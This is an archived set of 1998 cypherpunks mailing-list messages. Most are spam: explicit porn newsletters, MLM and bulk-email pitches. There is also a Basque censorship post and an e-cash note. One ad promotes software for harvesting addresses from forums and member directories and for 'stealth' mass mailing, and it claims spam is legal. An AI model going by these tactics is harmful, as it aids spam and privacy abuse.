*REAL LIVE SEX!!!  MUST SEE TO BELIEVE THIS SHOW!! Never seen before on the internet!

You must be 21 or older.

http://www.rrla.com
<A HREF ="http://www.rrla.com">AOL Click Here!</A> 

If you take offense to this email & wish to be taken off our list,
simply  e-mail us at: mwa234@hotmail.com
We are sorry for any inconvience.
0 29




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Fri, 2 Jan 1998 01:16:23 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Fri Jan 2 '98
Message-ID: <19980102081607.23798.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Friday's issue of Eureka!

HE GIRLS!
This site calls itself  "The original She-Male, slut wonder-
land",  and it's hard not to agree.  With multiple live she-
male slut video feeds. Huge numbers of amazing shemale pics,
extra  hot stories  and so much more,  you'll just love this
site. And what's more, we have arranged a special free trial
membership for all Eureka! subscribers.  So go check it out!
HeGirls ... http://207.33.10.198/cgi-bin/gate1/pbm/he_0024/0

GAYEUREKA!
NEW!! The new gay newsletter  is now available.  All the gay
material from this newsletter and a whole load more will now
appear in the new newsletter. If you would like to subscribe
Please click here ..... http://eureka.abc-web.com/gayeureka/

EUREKA! is now  available in three additional languages.  So
now you can choose from any of the following. And don't for-
get, from January 10th we'll add Portuguese and Italian too!
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm

NOT A DREAM, IT IS 1998!
It's the Asian invasion!  In response to your many emails we
have some of the best looking pussy from the orient. Sit and
surf the nastiest sites on the web. Enjoy your free pix too!

18X
First thing past the warning, pic your language and your off
to some serious Oriental bush.  Raw young ladies abound! You
asked for it and here it is.  "Hot horny hentai??"  Surf it!
18X .................................... http://www.18x.com/

PORN HEAVEN
Easy to navigate and quick loading.  "Welcome to Porn Heaven
a real adult site with plenty of hardcore adult content!" It
sure does have a lot of snatch in there. Decent Amateur pix!
As well as sexy teen, oral sex, older women and gay men too.
Porn Heaven ......................... http://pornheaven.com/

SITTIN' PRETTY
Kind of a butt mans paradise. Worth the surf! "We are focus-
ing on a side of the female body that  doesn't get exploited
enough... The backside!"  Kick ass looking asses! Zip by it.
Sittin' Pretty ....................... http://207.254.20.52/

THE SNOWMAN
This web designer has been hard at work! Great use of frames
and fast loading free pix! Lots of dick sucking, tit sucking
babes.  High resolution pix too.  Definitely worth the surf!
The Snowman ..................... http://www.thesnowman.com/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
20vids+Chat .. http://209.1.31.175/chat/videochat.cgi?eureka

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
TARIN:  A sweet and not so  innocent Southern California an-
gel. This darling of the web offers a rich variety of photo-
graphs.  The pictures of  this lass include  a compliment of
indoor and outdoor shots that are hot enough to tempt anyone
into sin! Stop by and visit this fallen angel and see if you
agree. ..................... http://amateurindex.com/eureka/

TODAY'S FREE PIX
OK,  it's the new year, and now we are really going to start
getting in gear,  with some of the hottest FREE photos ever!
Pic  1 ........................... http://137.39.63.229/?020
Pic  2 ........................... http://137.39.63.229/?021
Pic  3 ........................... http://137.39.63.229/?022
Pic  4 ........................... http://137.39.63.229/?023
Pic  5 ........................... http://137.39.63.229/?024
Pic  6 ........................... http://137.39.63.229/?025
Pic  7 ........................... http://137.39.63.229/?026
Pic  8 ........................... http://137.39.63.229/?027
Pic  9 ........................... http://137.39.63.229/?028
Pic 10 ........................... http://137.39.63.229/?029

PLEASE VISIT THIS FINE EUREKA! MEMBER SITE
Women and Men XXX PICS
http://www.execpc.com/~changes/hello.html
Plenty of free pictures of both men and women, We have a
free site so come by and check it out today. If you are hot
and horny then come on over guys and gals

------------------------------------------------------------
If you would like to unsubscribe from the Eureka! Newsletter
simply select reply and send us a quick reply to this email.
------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abc.88060@major.com
Date: Fri, 2 Jan 1998 09:53:45 -0800 (PST)
To: yep@nope.com
Subject: Internet Admin
Message-ID: <199801021753.JAA04369@blackie.cruzers.com>
MIME-Version: 1.0
Content-Type: text/plain


It's TRUE!  We would like to become your Internet Administrator, PLUS your
Long Distance Provider and EVEN ELECTRIC UTILITY PROVIDER.  It's all possible
now under our BRAND NEW MARKETING PLAN, thanks to Utility De-REGULATION starting
Jan. 1st. 

http://www.1stlady.com/cgi-bin/index.cgi?sponsorid=/sim9876    -  
Why Not Get Started Now -  Timing is Everything!

You can make the money the Utility Companies have been making 
off of you and your neighbors for decades.  But you MUST ACT NOW!  We even have 
a Debit/Credit card with up to a $5,000 Limit with no Credit Checks.  
(Yes, you've heard this before, but this card is now shipping to our members.)

Please Visit My Website for more information on how you can Make a Nice 2nd Income
by Joining the 1st Network Marketing Plan to include ALL THE PUBLIC Utilities
in One.  This means you can have FREE INTERNET ACCESS, FREE LONG DISTANCE, 
FREE ELECTRICITY, FREE SATELLITE SERVICE.  More Coming Soon!

THAT'S NOT ALL.

We also give you a Web Page that will allow your Web Site Visitors to fill out 
the application on YOUR webSite putting them automatically into our ONLINE DOWNLINE
which you can also see online.  Our Founder,wrote the Book, "Marketing on the Internet" from Maximum Press and so this plan is different from ALL others you receive in your mailbox.

AND if you ACT TODAY, you also get a Free Subscription to Internet Family Life,
the Internet's Premiere Electronic Magazine delivered to you weekly and filled
with tons of free offers, software, hardware, contests, free travel bonuses, marketing 
tips, money saving coupons, and much much more.
 
To get Started visit, http://www.1stlady.com/cgi-bin/index.cgi?sponsorid=/sim9876    
FILL OUT the online form and you will start building your business with MANY others joining under you.  More information will follow from your Upline Sponsor.  ME.

Or use our Fax On Demand to learn more and get started.  With a Fax Machine Call 
703-904-7770  Doc# 376







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SPG <tank@xs4all.nl>
Date: Fri, 2 Jan 1998 04:43:58 -0800 (PST)
To: fight-censorship@vorlon.mit.edu
Subject: Banned video "Democratic Alternative" now online
Message-ID: <m3u3bn12q0.fsf@tank.worldcom.nl>
MIME-Version: 1.0
Content-Type: text/plain



The "Democratic Alternative for the Basque Country" video (banned in Spain)
is now available in RealVideo format thanks to Contrast.Org.  You can watch or
download the video from the Euskal Herria Journal "mirror" sites:
            
               http://www.osis.ucsd.edu/~ehj
               http://www.contrast.org/mirrors/ehj  


Leaders of Herri Batasuna in Bizkaia and Gipuzkoa were jailed on
Friday to begin serving their seven year prison sentences for having
disseminated ETA's peace proposal, the Democratic Alternative.

On December 1, 1997, Spain's Supreme Court convicted the entire
leadership of Herri Batasuna of "collaborating with an armed group"
and sentenced them to seven years each in prison for attempting to
show a video (The Democratic Alternative), a proposal for cease-fire
and peace from the Basque armed organization ETA during an election
campaign broadcast last year.

The court failed to prove the participation of each of the 23
politicians in the decision to broadcast the video and thus, it
violates the principle of the presumption of innocence.

The judges considered that a crime was committed when in fact the
video had never been broadcasted. Moreover, the judges applied
Franco's Penal Code, which declared the crime of "collaborating with
an armed band" as any type of collaboration with the activities and
goals of an armed group. It thus criminalizes the role of intermediary
in disseminatiing negotiating positions or peace proposals in a bitter
and long standing conflict. 

When Herri Batasuna first showed the video in public meetings in early
1996, Spain's National Court (Franco's Tribunal of Public Order
renamed) banned the video. The then Socialist government--more than 14
of whose police and senior government officials and a Civil Guard
general have been formally charged for their involvement in the
creation, funding, and activities of the death squads that killed at
least 28 suspected Basque activists in the mid 1980s--instructed the
attorney general to investigate whether Herri Batasuna should be
outlawed. Herri Batasuna then attempted to use segments of the ETA
video to disseminate the peace proposal in their election campaign but
its broadcast was banned. In May 1996, the Socialist lost the general
elections to the Partido Popular (Popular Party, founded by Franco's
Minister of Interior). 

In January 1997, Spain's Supreme Court decided to prosecute the 23
leaders of Herri Batasuna. Over 30,000 people rallied in February in
the Basque city of Bilbo to protest the prosecution of the Herri
Batasuna leadership. The demonstration, which was initially peaceful,
turned into a violent confrontation when the police opened fire with
live ammunition, wounding several people. In June, an International
Commission for Freedom of Expression presented the Manifesto to the
Public Opinion and the International Community in support of free
speech and opposition to the trial against Herri Batasuna. The
president of Sinn Fein, Gerry Adams, and other distinguished
individuals are among the 700 signatories who endorsed the Manifesto.

International observers from human rights organizations in eleven
countries watching the proceedings issued a joint statement saying
that the accused were given the burden of proof which "violates the
fundamental principle of the presumption of innocence."

Basque political parties have strongly criticized the sentences,
saying that the trial was politically motivated and dashed hopes for a
peace dialogue.

Herri Batasuna attorneys said that nothing had been proven and that
the trial was intended to outlaw a political party which represents
much of the vote of the Basque people. They will appeal the sentence.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Success@27194.com
Date: Thu, 1 Jan 1998 21:14:08 -0800 (PST)
To: Friend@public.com
Subject: BulkEmailDoneForYou
Message-ID: <122802130356.GAA08056@nowhere.com>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
Sorry for this intrusion. Your address was passed on to
me as someone who might be interested in Internet Marketing
of their business/product/opportunity or service.

I offer Bulk Email sent at the following rates:

100,000 $75
200,000 $150
500,000 $300
1 million  $500

You may either use addresses from my database (provied free) or your own.
You must provide me with a prepared text for mailing of a suitable 
length.  
Contact me at:
ICQ  6698881  
for further details.

If you don't already have the ICQ chat utility, you
can download your free copy at:
http://www.mirabilis.com/

Wishing you a Prosperous future,

BulkEmailDoneForYou


</FONT><FONT  COLOR="#000000" SIZE=3>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mibe@prodigy.com
Date: Fri, 2 Jan 1998 19:10:25 -0800 (PST)
To: mibe@prodigy.com
Subject: Sneak Preview
Message-ID: <199801033634DAA21776@post.net>
MIME-Version: 1.0
Content-Type: text/plain


Please REPLY with YES in the subject line for
a sneak preview of an incredible new website,
coming soon:

BOOKS: all downloadable, many free;
MUSIC: world's largest selection of CDs and tapes;
MOVIES: thousands of videos, lowest prices anywhere;
SOFTWARE: thousands of titles, many downloadable

Examples:

* "Huck Finn" by Mark Twain
* elsewhere $5.95 in paperback; our price: free!
* (Plus hundreds of other titles)

* "Always be my Baby" CD by Mariah Carey
* elsewhere $5.95; our price $2.63

* "Scream" Video
* elsewhere $24.95; our price $17.24

* "CoffeeCup" HTML editor
* elsewhere $59.95; our price $30

We ship worldwide with low shipping charges,
no excessive markup for "shipping and handling."

You must REPLY with the word YES in the subject
line to receive advance notice. 

If you would like to be removed from future mailings,
E-mail remove@amnent.com and type remove in the
subject line.

Thanks, and happy holidays!
3bject: (tm) - To: m




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 1wmsi043o@worktow1est.com
Date: Fri, 2 Jan 1998 20:56:51 -0800 (PST)
To: eduacation@children423.net
Subject: Give Your Child "One of the Best Children's Videos""
Message-ID: <BnLV9l40RIH9N>
MIME-Version: 1.0
Content-Type: text/plain


The holidays are upon us.  If you're like a lot of people, you struggle to
find gifts for your children that will entertain and amuse them at the same
time.  Well, here's a gift that will delight your child -

A Is For Airplane!

"A Is For Airplane" is the award-winning educational video that shows kids
all the fun and teamwork involved in running an airline.  "A Is For Airplane"
gets viewers behind the scenes at the airport!  Kids get to see:

*  The ticket counter!
*  Inside the baggage system!
*  On the ramp with the baggage loaders and fuelers!
*  In the catering kitchens!
*  Inside the control tower!
*  In the hangar with the mechanics!
*  At the boarding gate!
*  And even in the COCKPIT of a real Boeing 757!

Parenting Magazine calls "A Is For Airplane" "One of the Best Videos of
1996!"  It's also Approved by the Parent's Choice Foundation!

Thousands of copies of "A Is For Airplane" have been sold for $14.95, but as
an Internet Special this holiday season you can get "A Is For Airplane" for
only $11.95 (plus shipping and handling.)  ORDER TODAY FOR GUARANTEED HOLIDAY
DELIVERY!

You can order "A Is For Airplane" by calling our toll-free number -
800-250-4210.

If you'd like more information, visit our Website at
www.ppmm.com/jfp/jfp1297.htm

or CLICK HERE!

Thank you for your time...

Johnson Family Productions
Madison, WI





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bairuana8@juno.com
Date: Sat, 3 Jan 1998 00:41:24 -0800 (PST)
To: bairuana8@juno.com
Subject: rush rush
Message-ID: <19980103916SAA8876@post.penzberg.de>
MIME-Version: 1.0
Content-Type: text/plain


     
      It seems both you and I have an interest in making money.  Our research indicates the following material is of interest to you.  Sorry for the intrusion, you will only receive this message once.  Thank you.

     Do you have any product, recipe, idea, service, website, MLM, or business that you would like to expose to thousands of people for pennies on the dollar?  Well, advertising on the internet is the only way to go.

     There are thirty million people currently on the internet with that number increasing by fifty thousand per month.  Imagine the ability to reach these people overnight for a fraction of the cost of direct mailing.  This is what we have to offer.

     If you would like more info, please respond to FUTURE849@earthlink.net and type info in the subject box.  Please include any questions you have.  I hope you are having a great holiday season.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Sat, 3 Jan 1998 01:59:28 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Sat Jan 3 '98
Message-ID: <19980103082548.18031.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Saturday's issue of Eureka!

CYBEREROTICA
If you want serious porn, real porn, lots of porn we suggest
you join CyberErotica for a FREE 1 week  introductory offer,
You get some of the best content for a lower price than many
premium adult sites.  There are hundreds of  FREE Stripshows
& Video Channels,  thousands of photos and more! If you just
want to try it out you can sign up for a full week for FREE!
CE ... http://www.cybererotica.com/ad/welcome.cgi/raw_3971/A

GAYEUREKA!
NEW!! The new gay newsletter  is now available.  All the gay
material from this newsletter and a whole load more will now
appear in the new newsletter. If you would like to subscribe
Please click here ..... http://eureka.abc-web.com/gayeureka/

EUREKA! is now  available in three additional languages.  So
now you can choose from any of the following. And don't for-
get, from January 10th we'll add Portuguese and Italian too!
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm

LADIES WHO LOVE IT
Great pix of hot horny women.  There are a few free jpegs of
good looking  babes fucking.  Your hand may  just leave your
mouse? From there check out Ladies who love ladies. Not bad.
Ladies Who ....... http://www.janey.com/~arnold/marc/ladies/

THE ULTIMATE HARDCORE NUDIE BAR
Ohh yeah! This is a hot spot! Long legged, white lace stock-
ings, pearls and hot nipples.  Sound good? They have several
types to select from including amateurs, hardcore and teens.
The Ultimate Hard ..... http://www.nudie-bar.com/ultwarn.htm

FREE NAKED THINGS ON THE WEB
Jackpot! This site has lots of great free pix! Most of these
ladies look like models and they are showing bush and labia!
There isn't a skanky one in the bunch!  This is a must surf!
Free Naked Things ......... http://www.znd2.net/karpo/site1/

ASTRO NUDE
This site is not going to win any design awards today but it
does have some free pix and is easy to surf around in.  They
have busty ladies, teens and asian selections. Check it out.
Astro Nude ... http://204.69.248.200/3527glz/johnro/cum.html

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Mpegs, RealVideo and RealAudio ............. www.sexwav.com/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
JANEY:  The godmother  to all amateur websites.  This classy
lady has been  the leader of  amateur innovation.  She has a
plethora of pictures, and other exciting diversions! Believe
it or not this hot lady is a grandmother! Janey's webpage is
a guiding light  and mecca to all inspiring amateurs.  Visit
the  elegant  lady and see  what first  class is  all about.
Janey ...................... http://amateurindex.com/eureka/

TODAY'S FREE PIX
OK,  it's the new year, and now we are really going to start
getting in gear,  with some of the hottest FREE photos ever!
Pic  1 ........................... http://137.39.63.229/?030
Pic  2 ........................... http://137.39.63.229/?031
Pic  3 ........................... http://137.39.63.229/?032
Pic  4 ........................... http://137.39.63.229/?033
Pic  5 ........................... http://137.39.63.229/?034
Pic  6 ........................... http://137.39.63.229/?035
Pic  7 ........................... http://137.39.63.229/?036
Pic  8 ........................... http://137.39.63.229/?037
Pic  9 ........................... http://137.39.63.229/?038
Pic 10 ........................... http://137.39.63.229/?039

PLEASE VISIT THIS FINE EUREKA! MEMBER SITE
FORNICATE.COM
http://www.fornicate.com/enter.html
If your like free FUCK pics, visit FORNICATE.COM - Where
every kind of fucking can be found!! Group Sex, Anal Sex,
Straight Sex, Gay Sex, Bizarre Sex, & Lesbian Sex!! You name
it, it is at FORNICATE.COM

------------------------------------------------------------
If you would like to unsubscribe from the Eureka! Newsletter
simply select reply and send us a quick reply to this email.
------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 3 Jan 1998 07:40:23 -0800 (PST)
To: Recipient List Suppressed:;
Subject: E-Cash cost advantage acknowledged
Message-ID: <v04002706b0d409bea1a8@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain


Remember all the stuff I say about the markedly reduced costs of digital
bearer transactions?

Wanna bet that if a bunch of big bankers say the cost reduction one order
of magnitude, given Moore's Law and a little programming elbow grease, we
can bring it down to three?

Cheers,
Bob Hettinga


--- begin forwarded text


X-Sender: schear@mail.lvdi.net (Unverified)
Mime-Version: 1.0
Date: Fri, 2 Jan 1998 23:01:06 -0800
To: rah@shipwright.com
From: Steve Schear <schear@lvdi.net>
Subject: E-Cash cost advantage acknowledged

The vast cost advantages of e-cash transactions was acknowledged in a
Banking Industry Technology Secretariat (BITS) paper presented at last
year's Electronic Payment Forum meeting in Hilton Head, SC on July 17-18,
1997.
http://www.epf.net/PrevMtngs/July97Mtng/Presentations/Schutzer/index.htm
BITS, a Division of The Bankers Roundtable, members are the 125 largest
U.S. holding companies represent 70% of financial assets and deposits in
the United States and employ over 1 million people.

Projections provided by Salomon Brothers, Nilson Report, Financial
Institutions and Markets, and Boston Consulting Group, show e-cash
transaction costs easily outdistance ACH/EFT by a factor of 10.  Credit
cards will be about 40 times as costly.  Even the highly touted ECP
(Electronic Check Payment) approaches are likely to be 20 times as
expensive.

What is most interesting is that despite this acknowledgement almost all
the BITS member institutions are pursuing a path away from e-cash and
second place EFT embracing higher margin (and higher merchant/consumer
cost) alternatives, for example VISACash (cash in name only).  In fact,
many major banks see EFT/POS (and e-cash) is a threat to their franchises
and have moved to keep them from expansion through non-competitive
practices and regulatory pressure.

--Steve


PGP mail preferred, see  	http://www.pgp.com and
				http://web.mit.edu/network/pgp.html

RSA fingerprint: FE90 1A95 9DEA 8D61  812E CCA9 A44A FBA9
RSA key: http://keys.pgp.com:11371/pks/lookup?op=index&search=0x55C78B0D
---------------------------------------------------------------------
Steve Schear              | tel: (702) 658-2654
CEO                       | fax: (702) 658-2673
First ECache Corporation  |
7075 West Gowan Road      |
Suite 2148                |
Las Vegas, NV 89129       | Internet: schear@lvdi.net
---------------------------------------------------------------------

	I know not what course others may take; but as for me,
	give me ECache or give me debt!

	"It's your Cache"



--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ruemou32@cc1.kuleuven.ac.be (Floodgate)
Date: Sat, 3 Jan 1998 09:23:44 -0800 (PST)
To: ruemou32@cc1.kuleuven.ac.be
Subject: Bulk Email For Profit
Message-ID: <199801031623UAA45320@post.ast.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



******************************************************
        
            MAIL THOUSANDS OF EMAIL MESSAGES
                PER HOUR - NO KIDDING !!

          SEND YOUR EMAIL MESSAGES OUT, AT
         1,000's MESSAGES / HOUR (28.8K modem)

           YES, 1,000's  Of Messages An Hour

******************************************************

	MILLIONS  OF  EMAIL  ADDRESSES

                      ******** $100.00 *******

******************************************************

  YOU'LL RECEIVE 2 HIGH-SPEED EMAIL SOFTWARE PROGRAMS

Introducing...."FLOODGATE BULK EMAIL LOADER" 
        AND...."GOLDRUSH STEALTH MASS MAILER"

This is the same software that all bulk emailing services use!

*******************************************************

           ALSO AVAILABLE - - - -  RESELL RIGHTS
                        - - - - - - - - - - - - - - - - - - - - - 
            YOU CAN NOW RESELL THIS UNIQUE
               EMAILING SOFTWARE AND EARN
                        $100.00 PER SALE
             AND NEVER DO ANY TECH SUPPORT
            WE'LL DO IT FOR YOUR CUSTOMERS

----------------------------------------------------------------------------------------

Floodgate Bulk Email Loader Version 6.0 AND
Goldrush Stealth Mass Mailer Version 3.215
for Windows 95 and Windows 3.1 now Supports 17 
(really more with the free form filter) File Formats

------------------------------------------------------------------------------------------


SEND OUT 20,000+ MARKETING LETTERS EVERY SINGLE DAY!

Or...every few days. In fact, when I send out just a few thousand marketing letters each day, it doesn't take long before I'm completely swamped with email inquiries and phone calls. This is very easy to do. And each one of these bulk mailings costs me nothing. I can teach you how to do this and provide you with the tools you'll need.

If you've got a good marketing letter, I'll show you how to open the floodgates. You'll be deluged with inquiries, leads, and real sales, using nothing but email alone.

Writing a good marketing letter is not easy. I often have to rewrite my marketing letters a half dozen times before I get the results I'm looking for. But once you have a good letter, as you probably know, you can use the same letter over and over again, predictably and consistently, closing sales, week after week, month after month.

It takes me about one hour to send my marketing letter to THOUSANDS of fresh email addresses. I can do this, thanks to a Windows program I use. It's called Floodgate and Goldrush Stealth Mass Mailer. It's a bulk email loader and an email software program. If you're interested in electronic marketing, you should know about these programs.

PROGRAM #1: FLOODGATE FOR WINDOWS

The Floodgate Bulk Email Loader imports simple text files that anyone can download from CompuServe, Prodigy, Delphi Genie, or the Internet. These text files contain classified ads, forum messages, or data from the member directory. Each of these files is filled with email addresses.

Floodgate is designed to read these files and strip out the email addresses. It then sorts the addresses, removes any duplicates, and formats them into an output file, with 10, 20 or 30 addresses per line. This is all done in one simple step. Just point and click.

You'll need either a Windows based Internet account or an America On-line account to send out your marketing letters. Neither AOL nor the Internet charges to send email. Send your letter to 1,000 people or 10,000 people -- the cost is always the same. NOTHING!

NEW! PREPARE A MAILING OF 50,000+ 
IN LESS THAN A 1/2 HOUR

If you open an Internet account, you can send each letter to 20,000+ people. The new Floodgate now directly writes distribution lists. Some people are always collecting new addresses, but if you publish a newsletter or adsheet, you'll be using the same addresses over and over again. That's real power! When using addresses you've previously collected, you can press a few buttons and prepare a mailing of 50,000+ in less than a half hour.

(To get a list of all the Internet access providers in your local calling area goto: http://thelist.com and click on your area code.)

The Floodgate Users Guide will teach you, step by step, how to download the right files, how to strip the addresses, and finally, how to cut and paste the formatted addresses into your marketing letter. Or, if you have an Internet account, how to create distribution lists. One you've done this a few times you won't even have to think. It's that simple!

FOR THE BRAVE & DARING: PUSHING TECHNOLOGY TO ITS LIMITS

As you may know, the practice of sending unsolicited email is usually frowned upon, and most service providers have rules against it. But, like jay-walking, there is little enforcement. It's not illegal. If someone tells you that it is, ask them to provide the citation (and don't let them give you some nonsense about faxes - that's not email). They can't do it because it's not there. Sometimes, when a lot of people complain, I get a warning letter. And that's about it.

About 1 in 200 will write back and tell me, "take me off the list", which I can do, thanks to Floodgates Remove List feature. Many people reply back thanking me for sending them my informative letter. That's always nice. Most people though, just reply and say, "send me more info." In this way, it usually takes me two or three letters to close a sale.

The Floodgate Users Guide will provide you with proven formats for writing a successful marketing letter. You'll test and rewrite, test and rewrite. Then, once you've got it, just push a few buttons, and open the floodgates!!!

THE FLOODGATE BULK EMAIL LOADER CURRENTLY SUPPORTS 17+ FILE FORMATS

1. CompuServe Classifieds: Send your marketing letter to everyone who is running a classified ad. I'll teach you how to download all the classifieds from any single ad category. This is one of the most responsive list of buyers. They check their email every day and they're already in business.

2. America On-line Classifieds: Download 1,000 addresses in 15 minutes. These are excellent lists for business to business sales.

3. CompuServe Forums: You can join a forum and download hundreds of forum messages in a matter of minutes.

4. America On-line Forums: Choose from dozens of forums. All good targeted lists.

5. Prodigy Forums: Prodigy allows you to easily export any group of forum messages. More targeted lists.

6. Internet Newsgroups: These are all targeted lists. You'll be able to send your marketing letter to everyone who posts a message in any newsgroup. Easily collect 1,000's of addresses per hour.

7. America On-line Member Directory: Most member directories only allow you to search by city and state. With AOL, you can search by business type, hobbies, computer type, etc. This is the gem of all
member directories. Build huge targeted lists.

8. CompuServe Member Directory: This is a major resource. If you're willing to target your mailing to a single city, you can collect about 1,000 email addresses an hour.

9. Delphi Member Directory: The Delphi member directory allows you to search for people based on key words. These are good targeted mailing lists. A single search can easily generate 5,000 addresses.

10. Genie Member Directory: Similar to the CompuServe member directory, only you can download names much quicker. You can easily pull hundreds of thousands of addresses out of each of these member directories.

11. CompuServe File Cabinet: If you run classified ads, and save the responses in the CIM file cabinet, you'll be able to easily reuse these addresses. You can send your marketing letter to everyone in any single folder. Build master lists and clean UP your hard drive.

12. Free Form: If you have a text file with email addresses that floodgate does not support, chances are the Free Form filter will be just what you need. Just enter a key word to search for.

13. CompuServe Form Profiles (Forum Membership Directories): Easy to build targeted lists here. Each search can easily bring you 500+
addresses.

14. Genie Profiles: If you're building targeted lists, you'll get a lot of addresses very quickly from Genie.

15. Plain Addresses: Read Floodgate Master Files back into Floodgate to merge files and do selective mailings. Also useful for the management of email address lists that you might purchase.

Floodgate also has filters to allow you to include or exclude any groups of addresses in your final distribution lists. For example, you could include only email addresses that ended in .com or exclude all with .gov. You could exclude all noc, root, and other addresses that almost guarantee a negative response. These filters are fully configurable and can be used together.

BUILD REUSABLE MASTER FILES

Floodgate maintains Master Files for each of your marketing letters. If you download from the same place on a regular basis, you only want to send your letter to the new people. Floodgate will compare the new addresses with those in the Master File, and prepare a mailing list of only new people. The new addresses are, of course, then added to the Master File. With each new mailing your Master File grows and grows.

You may create as many Master Lists as you need. When you start a new marketing campaign, you'll want to send your new letter to everyone on your Master List. If you write a newsletter, each time you send your newsletter, you'll send it to everyone on a Master List.

THE REMOVE LIST

Very often, people will reply and tell you to take them off your mailing list. Place these addresses in the REMOVE.MST file and they will never receive another letter from you again. In this way, you will be operating your business with the most professionalism
possible.

DON'T BE FOOLED

We have some new competitors that have tried to copy Floodgate. The following list describes why Floodgate is BETTER.......

**Floodgate is a mature, bug free product. Not an initial release.
**Floodgate comes with over 100 pages of step by step       documentation.
**Floodgate is the only one offering a money back guarantee.
**Floodgate has more testimonials. 
**Filter for filter, Floodgate offers more capabilities, way more. 
**Floodgate does everything all the others *combined* claim. 
**Floodgate is by far the easiest to use.
**There is NO *cutting and pasting* with Floodgate. 
**We have by far, the BEST technical support.

SOME QUICK MATH

Floodgate can pay for itself in a few days. It can also cut your advertising costs down to almost nothing. Think of what the competition will do when they get their Floodgate program. Don't be left in the dust - there are 75 million people out there, just a few keystrokes away. Let's do the math:

- Email 50,000 sales letters (takes about 1-2 hours)
- Let's say your product will bring you $5 profit per   sale.
- Let's also say you only get a 1% response(occasionally higher).

* That's 500 orders x $5 = $2,500 profit !! Now imagine what 500,000 letters would do for your business !!

WHAT CAN I MARKET ON-LINE?

You can market anything on-line using direct email, that can be marketed using conventional postal direct mail marketing. The possibilities are practically endless. If it sells off-line, you can sell it on-line.

EASY TO INSTALL AND EASY TO LEARN

The Floodgate Email Loader requires Windows. The SUPPLIED MANUAL tells you where to go, what to do, and how to do it. All you need are basic computer skills that can be learned with a little practice or help from our computer savvy technicians.

PROGRAM #2: GOLDRUSH STEALTH MASS MAILER

Do not get this program confused with other slow speed programs that call themselves "STEALTH". This program is the only one in the world that can send email out at HIGH SPEEDS with one single connection to the internet. 

This is NEW, Cutting Edge Email Technology. First Of It's Kind.. The Most Powerful BULK EMAIL SENDER In The World.. NOTHING CAN EVEN COME CLOSE! 

Thanks to our top programmer's, this technology is NOW available and we are the only place you can get it from! 

     *ONLY "ONE" DIAL-UP OR ISDN CONNECTION NEEDED. 
     *NO MORE TERMINATED CONNECTIONS. 
     *NO MORE WAITING TO SEND LARGE AMOUNTS OF EMAIL. 
     *IMMEDIATE RESPONSE TO YOUR MASS MAILINGS. 
     *YOU WILL HAVE ALL THE CONTROL AND CONFIDENCE OF 
       SENDING EMAIL THE WAY IT SHOULD BE SENT... IN HUGE AMOUNTS! 
     *SEND YOUR WHOLE LIST IN ONE DAY, WHETHER IT BE 500,000 
       OR 5 MILLION - AND JUST SIT BACK AND WAIT FOR YOUR 
       ORDERS TO POUR IN. 
     *NO MORE DOWNLOADING UNDELIVERABLE NAMES.

